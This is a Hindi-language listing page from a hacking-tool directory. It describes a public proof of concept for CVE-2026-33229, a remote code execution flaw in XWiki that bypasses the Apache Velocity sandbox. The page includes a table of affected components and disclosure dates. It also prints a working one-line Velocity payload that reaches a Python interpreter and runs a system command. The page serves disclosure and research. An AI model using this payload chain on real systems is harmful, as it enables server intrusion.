Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-33229 — # CVE-2026-33229 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट Apache Velocity सैंडबॉक्स बायपास के माध्यम से XWiki RCE, तकनीकी विवरण और एक कार्यशील पेलोड के साथ। | Kitploit
उपकरण/GitHubGitHub/azefzafyoussef/cve-2026-33229
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेलोड डेवलपमेंट
GitHubazefzafyoussef/cve-2026-33229

CVE-2026-33229

# CVE-2026-33229 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट Apache Velocity सैंडबॉक्स बायपास के माध्यम से XWiki RCE, तकनीकी विवरण और एक कार्यशील पेलोड के साथ।

रिपॉजिटरी देखें
125 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-33229 — Apache Velocity सैंडबॉक्स बाईपास के माध्यम से XWiki RCE

CVE Severity Status

XWiki Platform में एक रिमोट कोड एक्ज़ीक्यूशन भेद्यता जो स्क्रिप्टिंग अनुमतियों वाले एक प्रमाणित उपयोगकर्ता को Apache Velocity सैंडबॉक्स को पूरी तरह से बाईपास करने की अनुमति देती है — Java Reflection की कोई आवश्यकता नहीं — Velocity संदर्भ में पहले से मौजूद प्री-इंस्टैंशिएटेड ऑब्जेक्ट्स को ट्रैवर्स करके।

📄 पूर्ण तकनीकी विवरण: youssefazefzaf.com/posts/cve


विवरण

फ़ील्डमान
CVE IDCVE-2026-33229
प्रभावित उत्पादXWiki Platform
घटकVelocity मैक्रो रेंडरर, पेज शीर्षक पैरामीटर
आवश्यक विशेषाधिकारप्रमाणित + स्क्रिप्ट अनुमति
प्रभावरिमोट कोड एक्ज़ीक्यूशन
GHSAGHSA-h259-74h5-4rh9
खोजा गया7 नवंबर 2025
पैच किया गया10 दिसंबर 2025
प्रकट किया गया8 अप्रैल 2026

प्रूफ ऑफ कॉन्सेप्ट

$request.request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("org.apache.batik.script.jpython.JPythonInterpreter").evaluate("import os; os.system('touch /tmp/RCE')") 

जिम्मेदार प्रकटीकरण सूचना: PoC पैच उपलब्ध होने के बाद प्रकाशित किया गया। उन सिस्टमों के विरुद्ध उपयोग न करें जिनके आप स्वामी नहीं हैं।

टूल डाउनलोड करें